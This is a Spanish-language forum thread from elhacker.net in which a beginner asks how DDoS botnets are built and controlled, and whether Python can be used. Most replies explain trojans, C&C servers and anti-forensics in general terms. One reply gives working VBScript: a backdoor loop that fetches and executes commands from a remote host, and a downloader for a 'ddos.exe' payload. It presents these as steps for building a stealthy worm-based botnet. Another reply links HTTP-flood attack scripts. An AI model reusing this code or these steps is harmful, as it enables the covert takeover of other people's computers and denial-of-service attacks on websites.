elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  dudas de un novato (DDos y Python)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: dudas de un novato (DDos y Python)  (Leído 9,079 veces)
Panic0

Desconectado Desconectado

Mensajes: 218



Ver Perfil
dudas de un novato (DDos y Python)
« en: 7 Mayo 2021, 03:29 am »

Hola, tengo una duda, tengo entendido que un ddos envía varias solicitudes a una web, con la intención de desbordar la capacidad del sitio web para evitar que este funcione correctamente.

Duda 1
Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet?  

Duda 2
Una vez que se tiene una botnet como hace el atacante para enviarlos al sitio web que quiere atacar?

Duda 3
Esto se puede hacer con python o se necesita otro lenguaje?

No sé si me explique bien.

(Cabe aclarar que todo esto es con fines de aprendizaje, no tengo las neuronas suficientes como para hacer algo así)


Gracias, y buen día/noche


En línea

Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.
keef

Desconectado Desconectado

Mensajes: 70



Ver Perfil
Re: dudas de un novato (DDos y Python)
« Respuesta #1 en: 7 Mayo 2021, 03:43 am »

Sigo siendo bastante novato en este mundo de la ciberseguridad, así que solo podré responderte con seguridad la pregunta 1 y 3.

Duda 1
Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet? 

Estos malwares, pueden presentarse en varias formas, por lo que tengo entendido, la mas común es el troyano.

Emotet, por ejemplo, era un troyano bancario que ingresaba a través de documentos PDF mayoritariamente.

Aunque una botnet puede usar los métodos de propagación típicos de un gusano informático para propagarse mas fácil y descontroladamente.

Duda 3
Esto se puede hacer con python o se necesita otro lenguaje?

Necesitas un lenguaje que utilice las apis win32 y que pueda acceder al sistema operativo y usar sus funciones, así que se podría decir que si, python puede ser utilizado para ese fin.

Saludos :rolleyes:


En línea

Panic0

Desconectado Desconectado

Mensajes: 218



Ver Perfil
Re: dudas de un novato (DDos y Python)
« Respuesta #2 en: 7 Mayo 2021, 03:49 am »

Sigo siendo bastante novato en este mundo de la ciberseguridad, así que solo podré responderte con seguridad la pregunta 1 y 3.

Estos malwares, pueden presentarse en varias formas, por lo que tengo entendido, la mas común es el troyano.

Emotet, por ejemplo, era un troyano bancario que ingresaba a través de documentos PDF mayoritariamente.

Aunque una botnet puede usar los métodos de propagación típicos de un gusano informático para propagarse mas fácil y descontroladamente.

Necesitas un lenguaje que utilice las apis win32 y que pueda acceder al sistema operativo y usar sus funciones, así que se podría decir que si, python puede ser utilizado para ese fin.

Saludos :rolleyes:
Ahhhh bien bien, muchísimas gracias por responder!!

Que tengas un excelente día/noche!
En línea

Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.
BloodSharp


Desconectado Desconectado

Mensajes: 813


¡ Hiperfoco !


Ver Perfil WWW
Re: dudas de un novato (DDos y Python)
« Respuesta #3 en: 7 Mayo 2021, 04:07 am »

Duda 1
Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet?
Como un programa cualquiera, siempre y cuando tenga capacidad de conexión remota...

Duda 2
Una vez que se tiene una botnet como hace el atacante para enviarlos al sitio web que quiere atacar?
Se lo especifica en el C2, dicho sea de paso puede estar escrito en casi cualquier protocolo, no necesariamente los que especifica ahí en wikipedia...

Duda 3
Esto se puede hacer con python o se necesita otro lenguaje?
Sería recomendable algún lenguaje que pudiera acceder a la API del sistema operativo víctima para la parte del cliente y el servidor podría ser cualquier lenguaje que vos quieras...


B#
En línea



Xyzed


Desconectado Desconectado

Mensajes: 307



Ver Perfil
Re: dudas de un novato (DDos y Python)
« Respuesta #4 en: 7 Mayo 2021, 04:23 am »

Hola.

Un ataque DDoS es un ataque de denegación de servicio distribuido. (Múltiples ordenadores/dispositivos incluidos en el ataque).
Un DoS es un ataque de denegación de servicio (Con un solo dispositivo puede realizarse).

Cita: Otro post donde consultaban algo similar (clickear hipervínculo de la cita).

El malware puede estar escrito en cualquier lenguaje y sí, en Python puede ser.
Byob utiliza Python justamente para su funcionamiento.
Una vez infectado el ordenador, el atacante puede ejecutar el "ataque" de la forma que quiera.
Puede ser enviando simplemente paquetes o corriendo una tool en los ordenadores infectados.


Saludos.
En línea

...
Danielㅤ


Desconectado Desconectado

Mensajes: 1.853


🔵🔵🔵🔵🔵🔵🔵


Ver Perfil
Re: dudas de un novato (DDos y Python)
« Respuesta #5 en: 7 Mayo 2021, 15:10 pm »

Hola, una botnet es como su nombre lo indica, una Red de bots, éstos bots son máquinas zombies de personas que tienen infectada su PC y que son controladas por la botnet del atacante para realizar ataques desde cientos o hasta miles de IPs/PCs infectadas.


1. Los malwares pueden ser de distritos tipos y se conectan a la botnet cuando la PC de la víctima se infecta y envía alguna petición/solicitud a la conexión remota del atacante para éste así saber, que ya tiene una nueva víctima.
Cuando el atacante recibide ese aviso puede saber opcionalmente datos de esa PC como por ejemplo, sistema operativo, versión del S.O., navegador que usa por defecto, softwares instalados, etc.

2. El malware instalado puede conectarse siempre al atacante y la víctima ni siquiera saberlo ni darse cuenta, por lo que el atacante cuando tiene un objetivo, lanza el ataque por ejemplo a un sitio web, pero el atacante no ataca directamente al sitio web, sinó que envía comandos/órdenes a la PCs infectadas/esclavas para que estas sean las que si se conecten al sitio web y asi saturen de peticiones masivas, por eso mientras más PCs infectadas tenga la botnet en su control, más fuerte será el ataque porque se podrán enviar más solicitudes.

Las PCs infectadas son controladas por el atacante por medio de un servidor de C&C (Comando y control):

https://es.wikipedia.org/wiki/Mando_y_control_(malware)

3. Si es posible hacerlo con Python, pero generalmente usan otro lenguaje como C, C++, C# o algún otro lenguaje compilado por ser más rápidos y potentes



Saludos
« Última modificación: 7 Mayo 2021, 15:18 pm por [D]aniel » En línea

mchz

Desconectado Desconectado

Mensajes: 2



Ver Perfil
Re: dudas de un novato (DDos y Python)
« Respuesta #6 en: 13 Mayo 2021, 05:28 am »

Hola,

Citar
Duda 1
Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet?
Las botnets en esencia suelen ser equipos infectados de algún troyano o backdoor que una vez infectadas hace a estos dispositivos parte de la red (cabe destacar que pueden ser de distinta arquitectura Cliente-Servidor, Peer to Peer).

Citar
Duda 2
Una vez que se tiene una botnet como hace el atacante para enviarlos al sitio web que quiere atacar?
Dependiendo de la arquitectura escogida, se requiere de un C&C (Servidor de mando y control), normalmente utilizan IRC, HTTP. Suelen usar DNS Dynamics gratuitas y un algoritmo de generación de subdominios que vinculan con la dirección IP de las máquinas infectadas (para P2P, tengo entendido que cargan una lista de las direcciones que se va compartiendo entre los nodos que conforman dicha red). Por IRC, crean un canal a las cuales se unen las máquinas infectadas esperando recibir ordenes. Aunque esos son los métodos que normalmente encuentras en Internet al describir el comportamiento de ese tipo de malware, es posible utilizar otros agentes para dirigir una botnet (incluso canales de telegram).

Citar
Duda 3
Esto se puede hacer con python o se necesita otro lenguaje?
Sí.


Anexo   :P
Ahora, según la creatividad y las necesidades de cada autor varían en...
1. cifrado del tráfico de las ordenes enviadas por el C&C, suelen usar TLS, RC4, AES256, PublicKeys, RSA, DES, pueden verse de forma mixta y con ciertas modificaciones en la lógica del cifrado.

2. Métodos de antiforensia con compilaciones seguras aprovechando la entropía /dev/urandom para generar firmas indecifrables en el código.

3. Hacen mucho uso de la programación modular (ya que esto evita que puedan desmenuzar el funcionamiento interno de la botnet en un análisis estático por parte de un Research)

4. Algunos infectan la MBR y hacen uso de tecnologías rootkit para evitar ser detectado.
« Última modificación: 13 Mayo 2021, 05:31 am por mchz » En línea

Ich bin wiedergeboren, ich bin zurück und gehe nicht. / Я возродился, я вернулся и не уйду. / I have been reborn, I have returned, and I will not leave.
John1Connor

Desconectado Desconectado

Mensajes: 11


El que no dice la verdad, es porque esta mintiendo


Ver Perfil
Re: dudas de un novato (DDos y Python)
« Respuesta #7 en: 16 Julio 2021, 16:03 pm »

Bueno, ya te aclararon en que consiste cada cosa. ahora te voy a contar cual es para mi la mejor opción.

Para hacer una botnet necesitas hacer un gusano (y no hay nada mejor que un lenguaje interpretado para eso), ese gusano debería ser bien sigiloso para infectar y reproducirse sin que las victimas se den cuenta dejando en cada ordenador infectado una "puerta trasera" abierta.

Para hacer un backdoor podes subir a un host un archivo en blanco (que luego vas a programar otro script dentro con comandos para descargar o ejecutar acciones en el pc infectado). Este archivo va a estar siendo checkeado y en caso de encontrar comandos dentro las ejecutara en el ordenador infectado dentro del script del gusano original.

Ejemplo de backdoor en vbs:
Código
  1. Do
  2. Dim oXMLHTTP : Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP"):
  3. oXMLHTTP.Open "GET", "http://www.ejemplo.com/comandos.txt", False:
  4. oXMLHTTP.Send:
  5. ExecuteGlobal oXMLHTTP.responseText :
  6. Wscript.Sleep 1000:
  7. Loop
  8.  

Una vez que tenes una buena red de zombies, cambias el archivo con los comandos del servidor y le pones lo que quieras que se ejecute.
Por ejemplo si queres que descargue un exe que realice un ataque DDos deberias poner este codigo en el txt que lee el backdoor y subir el ddos.exe al servidor

Código
  1. Dim oXMLHTTP
  2. Dim oStream
  3. Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP.3.0")
  4. oXMLHTTP.Open "GET", "http://www.ejemplo.com/ddos.exe", False
  5. oXMLHTTP.Send
  6. If oXMLHTTP.Status = 200 Then
  7.    Set oStream = CreateObject("ADODB.Stream")
  8.    oStream.Open
  9.    oStream.Type = 1
  10.    oStream.Write oXMLHTTP.responseBody
  11.    oStream.SaveToFile "ddos.exe"
  12.    oStream.Close
  13. End If
  14.  


y bueno finalmente ejecutar el programa, script o comandos que quieras, deja volar tu imaginacion...


Saludos!
En línea

0x22

Desconectado Desconectado

Mensajes: 77


Ver Perfil
Re: dudas de un novato (DDos y Python)
« Respuesta #8 en: 12 Octubre 2021, 21:16 pm »

Respondiendo a tu duda 1, yo me se algunos rats que traen la funcion de hacer ataques ddos, son rats diseñados para hacer botnets
En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.641


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: dudas de un novato (DDos y Python)
« Respuesta #9 en: 13 Octubre 2021, 11:58 am »

Hay un montón de scripts en Python para realizar ataques DDoS, no necesitas una botnet, basta con un listado grande servidores proxy's funcionando.

El método se llama Challenge Collapsar y es uno de los más sencillos y efectivos de realizar ataques layer 7, peticiones http.

CC (Challenge Collapsar) DDoS Script Code In Python3
https://github.com/GogoZin/Collapsar

Using Socks4/5 proxy to make a multithreading Http-flood/Https-flood (cc) attack.
https://github.com/Leeon123/CC-attack

Herramientas y métodos:
https://blog.elhacker.net/2021/09/ataques-denegacion-servicio-ddos-capa7-drddos-udp-capa3-4-herramientas.html

Mitigaciones:
https://blog.elhacker.net/2020/08/configuracion-avanzada-de-cloudflare-reglas-firewall-waf-detener-ataques-ddos-layer7.html
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
dudas novato en java.
Java
Ragnarok 3 4,045 Último mensaje 6 Septiembre 2004, 00:01 am
por Ragnarok
[VB] Dudas de novato... « 1 2 »
Programación Visual Basic
SuperDraco 19 8,650 Último mensaje 24 Julio 2011, 05:18 am
por Luna71c0
Dudas de un novato
Programación Visual Basic
SSantiago90 3 3,110 Último mensaje 17 Febrero 2012, 02:05 am
por dmgdani
novato con dudas wii
Dudas Generales
ivilin 2 2,699 Último mensaje 6 Enero 2014, 12:29 pm
por ivilin
Presentación y dudas de novato-novato...
Bugs y Exploits
Giacomo69 0 2,907 Último mensaje 13 Marzo 2016, 10:18 am
por Giacomo69
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines